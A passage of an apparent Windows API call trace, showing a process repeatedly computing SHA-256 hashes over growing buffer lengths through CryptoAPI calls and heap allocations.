	[0119.019] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.019] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0119.019] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd8e8
	[0119.019] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd8e8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd8e8, pdwDataLen=0x12942c) returned 1
	[0119.019] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.019] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.019] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.019] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.019] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0119.019] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd910
	[0119.020] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd910, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd910, pdwDataLen=0x12942c) returned 1
	[0119.020] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.020] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.020] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.020] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.020] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0119.020] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd938
	[0119.020] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd938, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd938, pdwDataLen=0x12942c) returned 1
	[0119.020] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.020] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.020] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.020] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.020] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0119.021] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd960
	[0119.021] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd960, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd960, pdwDataLen=0x12942c) returned 1
	[0119.021] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.021] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.021] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.021] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.021] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0119.021] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd988
	[0119.021] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd988, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd988, pdwDataLen=0x12942c) returned 1
	[0119.021] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.021] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.021] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.022] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.022] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0119.022] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd9b0
	[0119.022] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fd9b0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd9b0, pdwDataLen=0x12942c) returned 1
	[0119.022] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.022] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.022] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.022] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.022] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0119.022] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fd9d8
	[0119.022] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fd9d8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fd9d8, pdwDataLen=0x12942c) returned 1
	[0119.022] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.022] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.022] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.023] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.023] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0119.023] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fda00
	[0119.023] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fda00, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fda00, pdwDataLen=0x12942c) returned 1
	[0119.023] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.023] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.023] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.023] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.023] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0119.023] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fda28
	[0119.023] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fda28, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fda28, pdwDataLen=0x12942c) returned 1
	[0119.023] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.023] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.023] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.024] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.024] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0119.024] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fda50
	[0119.024] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fda50, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fda50, pdwDataLen=0x12942c) returned 1
	[0119.024] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.024] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.024] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.024] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.024] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0119.024] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fda78
	[0119.024] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fda78, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fda78, pdwDataLen=0x12942c) returned 1
	[0119.024] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.024] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.024] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.025] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.025] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0119.025] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdaa0
	[0119.025] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdaa0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdaa0, pdwDataLen=0x12942c) returned 1
	[0119.025] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.025] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.025] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.025] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.025] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0119.025] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdac8
	[0119.025] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdac8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdac8, pdwDataLen=0x12942c) returned 1
	[0119.025] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.025] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.025] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.026] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.026] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0119.026] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdaf0
	[0119.026] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdaf0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdaf0, pdwDataLen=0x12942c) returned 1
	[0119.026] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.026] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.026] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.026] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.026] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0119.026] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdb18
	[0119.026] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdb18, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdb18, pdwDataLen=0x12942c) returned 1
	[0119.026] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.026] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.026] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.027] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.027] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0119.027] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdb40
	[0119.027] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdb40, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdb40, pdwDataLen=0x12942c) returned 1
	[0119.027] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.027] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.027] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.027] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.027] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0119.027] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdb68
	[0119.027] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdb68, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdb68, pdwDataLen=0x12942c) returned 1
	[0119.027] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.027] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.027] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.028] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.028] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0119.028] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdb90
	[0119.028] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdb90, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdb90, pdwDataLen=0x12942c) returned 1
	[0119.028] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.028] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.028] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.028] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.028] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0119.028] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdbb8
	[0119.028] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdbb8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdbb8, pdwDataLen=0x12942c) returned 1
	[0119.028] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.028] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.029] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.029] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.029] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0119.029] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdbe0
	[0119.029] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdbe0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdbe0, pdwDataLen=0x12942c) returned 1
	[0119.029] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.029] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.029] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.029] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.029] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0119.029] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdc08
	[0119.030] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdc08, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdc08, pdwDataLen=0x12942c) returned 1
	[0119.030] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.030] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.030] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.030] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.030] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0119.030] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdc30
	[0119.030] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdc30, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdc30, pdwDataLen=0x12942c) returned 1
	[0119.030] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.030] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.030] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.030] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.030] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0119.031] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdc58
	[0119.031] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdc58, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdc58, pdwDataLen=0x12942c) returned 1
	[0119.031] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.031] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.031] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.031] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.031] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0119.031] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdc80
	[0119.031] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdc80, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdc80, pdwDataLen=0x12942c) returned 1
	[0119.031] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.031] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.031] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.031] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.032] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0119.032] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdca8
	[0119.032] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fdca8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdca8, pdwDataLen=0x12942c) returned 1
	[0119.032] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.032] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.032] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.032] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.032] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0119.032] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdcd0
	[0119.032] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fdcd0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fdcd0, pdwDataLen=0x12942c) returned 1
